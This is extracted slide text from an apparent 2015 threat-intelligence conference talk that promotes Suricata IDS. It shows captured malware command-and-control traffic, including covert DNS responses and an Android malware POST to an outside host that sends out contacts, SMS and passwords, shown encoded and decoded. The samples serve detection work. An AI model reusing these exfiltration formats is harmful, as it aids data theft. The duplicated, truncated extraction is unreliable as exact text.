emerging threats jonkman_sans_cti_summit_2015

CONFIDENTIAL

Threat Intel: Winning the War

with Open Source Tools

Matt Jonkman

CTO, Emerging Threats

President, OISF

2

CONFIDENTIAL

● 13+ year old open IDS community

● ET-Open IDS rules for Snort and Suricata

● ETPro Commercial rules

● IP and DNS reputation feeds

● Query Portal

CONFIDENTIAL

Powering Network Defense Solutions Worldwide

• Installed in 10,000s of IDS/IPS sensors globally

• International staff of top threat researchers

• Trusted for timely, accurate, comprehensive threat intelligence

3

• HQ in Indianapolis, IN

• Originally founded as open source community in 2003

• Industry-leading cyber threat intelligence services• ETPro™ Ruleset

• IQRisk™ Rep List

• IQRisk™ Query

• 500+ customers in over 40 countries worldwide

4

● The Problem: Malware, Kits, Zombies →

● How to APPLY data

● Suricata + Kibana + ETOpen + Rep Feeds

Agenda

5

CONFIDENTIAL

6

CONFIDENTIAL

7

CONFIDENTIAL

Malware Motivation

• Cash

• Data

• Warfare

9

Effective

Profitable

Constantly Refined

Exploit Kits

1

0

‣ IRC

‣ HTTP

‣ Non-Standard Protocols

‣ Custom Binary Channels

‣ Encrypted Channels

Command and Control

1

1

‣ SSL

‣ Emulate Known Good

‣ Social Networks

‣ Covert DNS Channels

‣ IM Networks

‣ SMS

Command and Control

1

2

Hello

xxxxxxxxxxxxxxxx.Windows XP.GT.Intel Pentium III Xeon

processor.x86 Family 6 Model 7 Stepping xxx

Mhz.xxxxxxx.RAM: 71 % used.RAM Total: xxxx MBs.Page

File: xxxx MBs.Page File Disponible: xxxx MBs.Virt Mem

Total: xxxxxxx MBs.Virt Mem Disponible: xxxxx MBs.Sin

Asignar.192.168.xxxx xxx xx.<xxxxx>--

1

3

inicio#&'b##'#UserXXXX#&'b##'#192.168.XX.5#&'b##'#XX

#&'b##'#XX-FXXXXXXXX5D#&'b##'#Microsoft Windows

XP/Service Pack 3

1

4

GET /index.html&_=13297496 HTTP/1.1

User-Agent: C3F0F3F7F6F485F4F4F9F7F3FAF9FBFAF3F5F9ACAFAEA6B1F2F9F3

Connection: Keep-Alive

Cache-Control: no-cache

Host: www.<redacted>.tk

In Plain Sight...

http://www.search.tk

GET / HTTP/1.1

User-Agent:

1427242021235223232E20242D2E213A253A26242E2525262621242E7B78797166252E

24

Host: xx5c1b1ea.ws


HTTP/1.1 200 OK

Server: nginx/1.1.11

Date: Sat, 07 Jan 2012 00:51:49 GMT

Content-Type: text/html

Content-Length: 189

Connection: keep-alive

Vary: Accept-Encoding

Expires: Wed, 28 Dec 2011 00:51:49 GMT


Pragma: no-cache

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

<html>

<head>

<body style='margin:0px;padding:0px'>

<iframe border='none' style='width:100%;height:100%;border:medium

none;' src='http://1.ws/wc/"xx5c1b01ea.ws"'></iframe>

</body>

</html>

http://1.ws/wc/

1

6

No One Will See Me on Port 80....

I’m a Ninja!

1

7

I’ll Make Up a l33t Protocol....

1

9

SSL!

1

9

<html><head><meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>C# Tutorial: GDI Drawing with Pen and Brush</title>

<LINK REL=StyleSheet HREF="default-1.css" tppabs="http://csharpcomputing.com/Tutorials/default.css" type="text/css">

</head><body>

<p> <a href="Lesson14.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson14.htm"><img border="0" src="PreviousArrow.gif"

tppabs="http://csharpcomputing.com/images/PreviousArrow.gif" width="26" height="26"></a>

<a href="index.htm" tppabs="http://csharpcomputing.com/Tutorials/index.htm"><img border="0" src="TOCIcon.gif"

tppabs="http://csharpcomputing.com/images/TOCIcon.gif" width="26" height="26"></a>

<a href="Lesson16.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson16.htm"><img border="0" src="NextArrow.gif"

tppabs="http://csharpcomputing.com/images/NextArrow.gif" width="26" height="26"></a></p>

<p><img border="0" src="blueline.gif" tppabs="http://csharpcomputing.com/images/blueline.gif" width="550" height="8"></p>

<h1>C# Tutorial, Lesson 15: Drawing with Pen and Brush.<br>

</h1>



<p>In this lesson I would like to introduce the Pen and the Brush objects. These objects are members of GDI+ library.

GDI+ or GDI.NET is a graphics library that lets you draw on a form. Prior to

.NET, C programmers were using GDI library to create breathtaking graphics.

GDI.NET is in fact just a wrapper for GDI. GDI+ is a great platform for

moderately complicated static graphs. However, it tends to be slow for moving

images and not sophisticated enough for 3 dimensional graphics. On Windows NT

platforms, GDI+ as well as GDI do not perform very well. The problem lies in the

way GDI/GDI+ runs. Windows NT architecture accepts user input in so called user

context and access graphics devices in system context. When GDI/GDI+ application

runs on Windows NT based machine, it has to constantly wait for these context

switches to occur. This makes GDI/GDI+ applications too slow for video game

programming and fancy 3 D graphics. Microsoft recently released a highly

optimized graphics platform - Managed DirectX which I will cover in a separate

tutorial.</p>

<script type="text/javascript"

src="show_ads.js" tppabs="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>

<p>The

<html><head><meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>C# Tutorial: GDI Drawing with Pen and Brush</title>

<LINK REL=StyleSheet HREF="default-1.css" tppabs="http://csharpcomputing.com/Tutorials/default.css" type="text/css">

</head><body>

<p> <a href="Lesson14.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson14.htm"><img border="0" src="PreviousArrow.gif"

tppabs="http://csharpcomputing.com/images/PreviousArrow.gif" width="26" height="26"></a>

<a href="index.htm" tppabs="http://csharpcomputing.com/Tutorials/index.htm"><img border="0" src="TOCIcon.gif"

tppabs="http://csharpcomputing.com/images/TOCIcon.gif" width="26" height="26"></a>

<a href="Lesson16.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson16.htm"><img border="0" src="NextArrow.gif"

tppabs="http://csharpcomputing.com/images/NextArrow.gif" width="26" height="26"></a></p>

<p><img border="0" src="blueline.gif" tppabs="http://csharpcomputing.com/images/blueline.gif" width="550" height="8"></p>

<h1>C# Tutorial, Lesson 15: Drawing with Pen and Brush.<br>

</h1>

<p>In this lesson I would like to introduce the Pen and the Brush objects. These objects are members of GDI+ library.

GDI+ or GDI.NET is a graphics library that lets you draw on a form. Prior to

.NET, C programmers were using GDI library to create breathtaking graphics.

GDI.NET is in fact just a wrapper for GDI. GDI+ is a great platform for

moderately complicated static graphs. However, it tends to be slow for moving

images and not sophisticated enough for 3 dimensional graphics. On Windows NT

platforms, GDI+ as well as GDI do not perform very well. The problem lies in the

way GDI/GDI+ runs. Windows NT architecture accepts user input in so called user

context and access graphics devices in system context. When GDI/GDI+ application

runs on Windows NT based machine, it has to constantly wait for these context

switches to occur. This makes GDI/GDI+ applications too slow for video game

programming and fancy 3 D graphics. Microsoft recently released a highly

optimized graphics platform - Managed DirectX which I will cover in a separate

tutorial.</p>

<script type="text/javascript"

src="show_ads.js" tppabs="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>

<p>The

2

3

23546.1.d869c6f2f70dd3dcf64b047f99f46be8.chr.santa-inbox.com

0-4-2-6-4-1-9-2-e-8-v-3-c-g-o-s-0-s-0-o-s-1-b-e-6-u-v-3-f-r-k.0-0-0-0-0-0-0-0-0-0-0-0-0-60-0-0-0-0-0-0-0-0-0-0-0-0-0.info

Covert DNS Channels

2

4

Request: TXT

2.32206.pf.deoderante.com

Response:

E9XnBP6CTP7zjAK43bg3RWWBwX5JpuFyTTpphcekpDR9nFPT7kzB3WEf9xe7fUAeFH4h1xWODFappd3kVXwLLdzAzjDSUs/ssIHbc8OFxhrw1D5Uh3UI1il+d5sa3oKB8qqo9oA8d5Jy4g7uwiScX+cBVkkrMMSsrAYTAiOjQswiVgU5AxQMybshGD0H0jRJVjBob6CLqMgcO0mpzxR1ccVbb8oG"

Covert DNS Channels

2

5

"606.32206.pf.deoderante.com" "YSVYuqd74esaWH10c1EpO+MlAHKnQYqmETuEmHsaBHNYXms0/cL741mv0/ZmFmH8rQPc/B2omFruELm/SoDpbKrXTXQQ3fGk8r8QwNserz4SsHvcb98MCf9hpXwz"606.32206.pf.deoderante.com" "YSVYuqd74esaWH10c1EpO+MlAHKnQYqmETuEmHsaBHNYXms0/cL741mv0/ZmFmH8rQPc/B2omFruELm/SoDpbKrXTXQQ3fGk8r8QwNserz4SsHvcb98MCf9hpXwz"125.32206.pf.deoderante.com" "ggSpBMkIvbQslNeiqAu47PnoWzYGV+8Z+3QJy06TYqoEJOHamYVvr7Wqh+zunjz3AkMPOr/aQoG5eytRn0zFxrU6tWGs8hHtVBh+YKExbc420fkDd+7hEgLAde5zpAiF4w7c"125.32206.pf.deoderante.com" "ggSpBMkIvbQslNeiqAu47PnoWzYGV+8Z+3QJy06TYqoEJOHamYVvr7Wqh+zunjz3AkMPOr/aQoG5eytRn0zFxrU6tWGs8hHtVBh+YKExbc420fkDd+7hEgLAde5zpAiF4w7c"125.32206.pf.deoderante.com" "ggSpBMkIvbQslNeiqAu47PnoWzYGV+8Z+3QJy06TYqoEJOHamYVvr7Wqh+zunjz3AkMPOr/aQoG5eytRn0zFxrU6tWGs8hHtVBh+YKExbc420fkDd+7hEgLAde5zpAiF4w7c"129.32206.pf.deoderante.com" "xf6cEqa+Kd9VHXFIglLDOmRprsAm0y+cGQetG9Ox+oTmKueMnNRMsw7y8Z3qwbm1foIEWo80bYoP894mAU1SmSOczlZJl2SOfUzDfqXk0EVoTYpqojSL/el6P3X74b"129.32206.pf.deoderante.com" "xf6cEqa+Kd9VHXFIglLDOmRprsAm0y+cGQetG9Ox+oTmKueMnNRMsw7y8Z3qwbm1foIEWo80bYoP894mAU1SmSOczlZJl2SOfUzDfqXk0EVoTYpqojSL/el6P3X74b"129.32206.pf.deoderante.com" "xf6cEqa+Kd9VHXFIglLDOmRprsAm0y+cGQetG9Ox+oTmKueMnNRMsw7y8Z3qwbm1foIEWo80bYoP894mAU1SmSOczlZJl2SOfUzDfqXk0EVoTYpqojSL/el6P3X74b"258.32206.pf.deoderante.com" "6Wq0OwvOLXPc4pY+ZEiwckGuOj2ytpWGIRqJVvaIigexqtErvq2eB4snZ98ai4/akXm51LTtSd/Ab6znCgv3J8Fp5rqHfxclsZsIg4sQgsg6OSXnIbe6KqA8fqpcmySO3asGYKSpiq4"258.32206.pf.deoderante.com" "6Wq0OwvOLXPc4pY+ZEiwckGuOj2ytpWGIRqJVvaIigexqtErvq2eB4snZ98ai4/akXm51LTtSd/Ab6znCgv3J8Fp5rqHfxclsZsIg4sQgsg6OSXnIbe6KqA8fqpcmySO3asGYKSpiq4"258.32206.pf.deoderante.com" "6Wq0OwvOLXPc4pY+ZEiwckGuOj2ytpWGIRqJVvaIigexqtErvq2eB4snZ98ai4/akXm51LTtSd/Ab6znCgv3J8Fp5rqHfxclsZsIg4sQgsg6OSXnIbe6KqA8fqpcmySO3asGYKSpiq4"82.32206.pf.deoderante.com" "wZrGGAUcq6KyLpHS6UJ33gsU9nHlVKVQb0c/vW/SMqcBJBGCAXgWhuM/Yznuy2GxuGqofc00+/WZDDXggkjMatgMGwpuxnTulFhMltiUPDeZqIuwMvuEL5W8U/iR"82.32206.pf.deoderante.com" "wZrGGAUcq6KyLpHS6UJ33gsU9nHlVKVQb0c/vW/SMqcBJBGCAXgWhuM/Yznuy2GxuGqofc00+/WZDDXggkjMatgMGwpuxnTulFhMltiUPDeZqIuwMvuEL5W8U/iR"82.32206.pf.deoderante.com" "wZrGGAUcq6KyLpHS6UJ33gsU9nHlVKVQb0c/vW/SMqcBJBGCAXgWhuM/Yznuy2GxuGqofc00+/WZDDXggkjMatgMGwpuxnTulFhMltiUPDeZqIuwMvuEL5W8U/iR"102.32206.pf.deoderante.com" "NcZigfVXSSbQvBgvyTzOswy2FycXceUFIuFpv3LCtKmtEZp1dv5j/46+/hHUbqdDktJrJwtf7m5kbTsehyGSuge/sI+3kpuHvfDLq7BhJjxnowc4cfSjnxtUrddTLwmaDdqdTLGpMJA"102.32206.pf.deoderante.com" "NcZigfVXSSbQvBgvyTzOswy2FycXceUFIuFpv3LCtKmtEZp1dv5j/46+/hHUbqdDktJrJwtf7m5kbTsehyGSuge/sI+3kpuHvfDLq7BhJjxnowc4cfSjnxtUrddTLwmaDdqdTLGpMJA"102.32206.pf.deoderante.com" "NcZigfVXSSbQvBgvyTzOswy2FycXceUFIuFpv3LCtKmtEZp1dv5j/46+/hHUbqdDktJrJwtf7m5kbTsehyGSuge/sI+3kpuHvfDLq7BhJjxnowc4cfSjnxtUrddTLwmaDdqdTLGpMJ"77.32206.pf.deoderante.com" "yXdQW5d2ZP7flSblgCSyk+dw5l3htIA+cAzVH77xDYDygFKdr/uR+88sdtq9YgjnWLKYCSP3y4AlL/pdx5MEvQl/CkFB6CwDtIqTMf4Jv0CeAHSgDOH0g8cfzO+tH5YbjNF1a"77.32206.pf.deoderante.com" "yXdQW5d2ZP7flSblgCSyk+dw5l3htIA+cAzVH77xDYDygFKdr/uR+88sdtq9YgjnWLKYCSP3y4AlL/pdx5MEvQl/CkFB6CwDtIqTMf4Jv0CeAHSgDOH0g8cfzO+tH5YbjNF1a"346.32206.pf.deoderante.com" "NlqjMiVKOLB/nLZ+w7x1130GwXmfICCvuLcyLGQDRxBWeTNbP5K8u9qlyX4WzcEWoPHkKcY/Ql+B63+zOwoGjnGbkmrKxefk+BxVFrs+ll+2/4k2WtwaltVdNKpa2A"346.32206.pf.deoderante.com" "NlqjMiVKOLB/nLZ+w7x1130GwXmfICCvuLcyLGQDRxBWeTNbP5K8u9qlyX4WzcEWoPHkKcY/Ql+B63+zOwoGjnGbkmrKxefk+BxVFrs+ll+2/4k2WtwaltVdNKpa2A"346.32206.pf.deoderante.com" "NlqjMiVKOLB/nLZ+w7x1130GwXmfICCvuLcyLGQDRxBWeTNbP5K8u9qlyX4WzcEWoPHkKcY/Ql+B63+zOwoGjnGbkmrKxefk+BxVFrs+ll+2/4k2WtwaltVdNKpa2A

2

6

Android!POST /upload.php HTTP/1.1

accept: application/json

Content-Length: 2958

Content-Type: application/x-www-form-urlencoded

Host: gi60s.com


User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Expect: 100-Continue

code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C%22numbers%22%3A%22MDgxLTUwMTItMzQ1N

>jc4OTswODEtNTAxLTIzNDU2Nzg5Ow%3D%3D%0A%22%7D%2C%7B+%22name%22%3A%22RXZl%0A%22%2C%22numbers%22%3A%22MDY1LTAzM

>S0zMzc7MDY1LTAzMS0zMzc7%0A%22%7D%2C%7B+%22name%22%3A%22VHJlbnQ%3D%0A%22%2C%22numbers%22%3A%22MDE5LTk5OTswMTk

>tOTk5Ow%3D%3D%0A%22%7D%5D%2C%22sms%22%3A%5B%7B+%22address%22%3A%22MDgxNTEyMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%2

>2%3A%221%22%2C%22date%22%3A%221337803772831%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%2C%7B+%22address%

>22%3A%22MDEwMjM0NQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766125374%22%2C%22body%22%3A%22W

>W91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdXIgQkFOSyE%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDY1MDMx

>MzM3%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766074005%22%2C%22body%22%3A%22SGkhIEhvdyBhcmUgeW91P

>w%3D%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxNTAxMjM0NTY3ODk%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3

>A%221337765998741%22%2C%22body%22%3A%22VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbjB0UzNjcjNUIGdyZWV0eg%3D

>%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22

>%3A%221337765942437%22%2C%22body%22%3A%22TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3Q%3D%0A%22%7D%2C%7B+%22ad

>dress%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765923366%22%2

>C%22body%22%3A%22SGkgQm9iLCBob3cgYXJlIHlvdT8%3D%0A%22%7D%5D%2C%22recent%22%3A%5B%7B+%22number%22%3A%220815123456789%22%2C%22type%22%3A%223%22%2C%22date%2

2%3A%221337

>803772327%22%2C%22duration%22%3A%220%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%22%3A%221%22%2C%22

>date%22%3A%221337766141605%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%2

>2%3A%222%22%2C%22date%22%3A%221337766020756%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%220815012

>3456789%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765897517%22%2C%22duration%22%3A%224%22%7D%5D%2C%22u

>rl%22%3A%5B%7B+%22url%22%3A%22aHR0cDovL3d3dy5iYmMuY28udWsv%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53ZWF

>0aGVyLmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5hbWF6b24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%

>3A%22aHR0cDovL2VzcG4uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8%3D%0A%22%7D%

>2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy

>5lYmF5LmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw%3D%3D%0A%22%7D%2C%7B+%22ur

>l%22%3A%22aHR0cDovL3d3dy5mYWNlYm9vay5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5teXNwYWNlLmNvbS8%3D%

>0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5tc24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5

>5YWhvby5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRy

>b2lkY2xpZW50%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3d

POST /upload.php HTTP/1.1

accept: application/json

Content-Length: 2958

Content-Type: application/x-www-form-urlencoded

Host: gi60s.com


User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Expect: 100-Continue

code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C%22numbers%22%3A%22MDgxLTUwMTItMzQ1N

>jc4OTswODEtNTAxLTIzNDU2Nzg5Ow%3D%3D%0A%22%7D%2C%7B+%22name%22%3A%22RXZl%0A%22%2C%22numbers%22%3A%22MDY1LTAzM

>S0zMzc7MDY1LTAzMS0zMzc7%0A%22%7D%2C%7B+%22name%22%3A%22VHJlbnQ%3D%0A%22%2C%22numbers%22%3A%22MDE5LTk5OTswMTk

>tOTk5Ow%3D%3D%0A%22%7D%5D%2C%22sms%22%3A%5B%7B+%22address%22%3A%22MDgxNTEyMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%2

>2%3A%221%22%2C%22date%22%3A%221337803772831%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%2C%7B+%22address%

>22%3A%22MDEwMjM0NQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766125374%22%2C%22body%22%3A%22W

>W91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdXIgQkFOSyE%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDY1MDMx

>MzM3%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A%221337766074005%22%2C%22body%22%3A%22SGkhIEhvdyBhcmUgeW91P

>w%3D%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxNTAxMjM0NTY3ODk%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3

>A%221337765998741%22%2C%22body%22%3A%22VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbjB0UzNjcjNUIGdyZWV0eg%3D

>%3D%0A%22%7D%2C%7B+%22address%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22

>%3A%221337765942437%22%2C%22body%22%3A%22TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3Q%3D%0A%22%7D%2C%7B+%22ad

>dress%22%3A%22MDgxLTUwMTItMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765923366%22%2

>C%22body%22%3A%22SGkgQm9iLCBob3cgYXJlIHlvdT8%3D%0A%22%7D%5D%2C%22recent%22%3A%5B%7B+%22number%22%3A%22081512

>3456789%22%2C%22type%22%3A%223%22%2C%22date%22%3A%221337

>803772327%22%2C%22duration%22%3A%220%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%22%3A%221%22%2C%22

>date%22%3A%221337766141605%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%22065031337%22%2C%22type%2

>2%3A%222%22%2C%22date%22%3A%221337766020756%22%2C%22duration%22%3A%224%22%7D%2C%7B+%22number%22%3A%220815012

>3456789%22%2C%22type%22%3A%222%22%2C%22date%22%3A%221337765897517%22%2C%22duration%22%3A%224%22%7D%5D%2C%22u

>rl%22%3A%5B%7B+%22url%22%3A%22aHR0cDovL3d3dy5iYmMuY28udWsv%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53ZWF

>0aGVyLmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5hbWF6b24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%

>3A%22aHR0cDovL2VzcG4uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8%3D%0A%22%7D%

>2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy

>5lYmF5LmNvbS8%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw%3D%3D%0A%22%7D%2C%7B+%22ur

>l%22%3A%22aHR0cDovL3d3dy5mYWNlYm9vay5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5teXNwYWNlLmNvbS8%3D%

>0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5tc24uY29tLw%3D%3D%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3dy5

>5YWhvby5jb20v%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRy

>b2lkY2xpZW50%0A%22%7D%2C%7B+%22url%22%3A%22aHR0cDovL3d3d

code=bb51d&data=

{"contacts":[

{"name":"Qm9i","numbers":"MDgxLTUwMTItMzQ1Njc4OTswODEtNTAxLTIzNDU2Nzg5Ow=="},{"name":"RXZl","numbers":"MDY1LTAzMS0zMzc7MDY

1LTAzMS0zMzc7"},

{"name":"VHJlbnQ=","numbers":"MDE5LTk5OTswMTktOTk5Ow=="}],

"sms":[

{"address":"MDgxNTEyMzQ1Njc4OQ==","type":"1","date":"1337803772831","body":"SGVsbG8gV29ybGQh"},

{"address":"MDEwMjM0NQ==","type":"1","date":"1337766125374","body":"WW91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdX

IgQkFOSyE="},

{"address":"MDY1MDMxMzM3","type":"1","date":"1337766074005","body":"SGkhIEhvdyBhcmUgeW91Pw=="},

{"address":"MDgxNTAxMjM0NTY3ODk=","type":"1","date":"1337765998741","body":"VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbj

B0UzNjcjNUIGdyZWV0eg=="},

{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765942437","body":"TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3

Q="},

{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765923366","body":"SGkgQm9iLCBob3cgYXJlIHlvdT8="}],

"recent":[

{"number":"0815123456789","type":"3","date":"1337803772327","duration":"0"},



{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],

"url":[

{"url":"aHR0cDovL3d3dy5iYmMuY28udWsv"},

{"url":"aHR0cDovL3d3dy53ZWF0aGVyLmNvbS8="},

{"url":"aHR0cDovL3d3dy5hbWF6b24uY29tLw=="},

{"url":"aHR0cDovL2VzcG4uY29tLw=="},

{"url":"aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8="},

{"url":"aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw="},

{"url":"aHR0cDovL3d3dy5lYmF5LmNvbS8="},

{"url":"aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw=="},

{"url":"aHR0cDovL3d3dy5mYWNlYm9vay5jb20v"},

{"url":"aHR0cDovL3d3dy5teXNwYWNlLmNvbS8="},

{"url":"aHR0cDovL3d3dy5tc24uY29tLw=="},

{"url":"aHR0cDovL3d3dy55YWhvby5jb20v"},

{"url":"aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRyb2lkY2xpZW50"}

code=bb51d&data=

{"contacts":[

{"name":"Bob","numbers":"081-5012-3456789;081-501-23456789;"},

{"name":"Eve","numbers":"065-031-337;065-031-337;"},

{"name":"Trent","numbers":"019-999;019-999;"}],

"sms":[

{"address":"0815123456789","type":"1","date":"1337803772831","body":"lo World!"},

{"address":"0102345","type":"1","date":"1337766125374","body":"Your smsTan: t4nS3cr3T Best Regards your

BANK!"},

{"address":"065031337","type":"1","date":"1337766074005","body":"Hi! How are you?"},

{"address":"08150123456789","type":"1","date":"1337765998741","body":"Thx for the password :) Mine is:

n0tS3cr3T greetz"},

{"address":"081-5012-3456789","type":"2","date":"1337765942437","body":"My secret password is: t0ps3cr3t"},

{"address":"081-5012-3456789","type":"2","date":"1337765923366","body":"Hi Bob, how are you?"}],

"recent":[




{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],

"url":[

{ "url":"http://www.bbc.co.uk/"},

{ "url":"http://www.weather.com/"},

{ "url":"http://www.amazon.com/"},

{ "url":"http://espn.com/"},

{ "url":"http://www.nytimes.com/"},

{ "url":"http://www.cnn.com/"},

{ "url":"http://www.ebay.com/"},

{ "url":"http://www.wikipedia.org/"},

{ "url":"http://www.facebook.com/"},

{ "url":"http://www.myspace.com/"},

{ "url":"http://www.msn.com/"},

{ "url":"http://www.yahoo.com/"},

{ "url":"http://picasaweb.google.com/m/viewer?source=androidclient"}

3

0

Defend Yourself!

3

1

Use the Tools!

Defense in Layers

Defense

3

2

Suricata!!!

Intrusion Detection

3

3

CONFIDENTIAL

Suricata – Cost-effective IDS

• Open-source IDPS

• Developed by the OISF

• First beta introduced in December 2009

• Supported OS

• FreeBSD

• Linux

• UNIX

• Mac OS

• Microsoft Windows

• Licensing and Availability

• GNU General Public License

• www.suricata-ids.org

http://www.suricata-ids.org

3

5

Current Release 2.0.6

and 2.1 beta

Many Agencies

Many Products

The IDPS of the Future

3

9

Top Reasons to Try

Suricata

4

0

Multi-Threaded Engine

4

1

Automated Protocol Detection

4

2

IP Reputation at Speed

4

3

File IdentificationFile ExtractionFile MD5sum

File_magic Identification

4

4

SSL Cert Extraction/Matching

SSL Analysis

SSL Logging

4

5

Cute Mascot

4

6

Lua Scripting

NSM Mode

Netflow Logging

4

7

Open Source in a Non-Profit!

4

8

JSON Output

4

9

Monitor and Log!

Defense

{"timestamp":"2014-11-

18T12:40:42.744230","flow_id":2901423184,"event_ty

pe":"fileinfo","src_ip":"213.136.29.218","src_port":80,"d

est_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",

"http":{"url":"/ubuntu/pool/main/u/util-

linux/bsdutils_2.20.1-

5.1ubuntu20.3_i386.deb","hostname":"nl.archive.ubunt

u.com","http_user_agent":"Debian APT-

HTTP/1.3(1.0.1ubuntu2)"},"fileinfo":{"filename":"/ubunt

u/pool/main/u/util-linux/bsdutils_2.20.1-

5.1ubuntu20.3_i386.deb","magic":"Debian binary

package

(format2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff

02cd3ded3cf0ce3a42","stored":false,"size":5475,"tx_id

":2}}


21T08:11:45.222089","flow_id":2896612328,"event_ty

pe":"tls","src_ip":"23.206.115.50","src_port":443,"dest_

ip":"10.8.0.6","dest_port":47063,"proto":"TCP",

"tls":{"subject":"serialNumber=5189573, unknown=US,

unknown=Delaware, unknown=Private Organization,

C=US, unknown=94107, ST=California, L=San

Francisco, unknown=855 FOLSOM ST APT 535,

O=Remember The Milk Inc., OU=Comodo EV SAN

SSL,CN=www.rememberthemilk.com","issuerdn":"C=

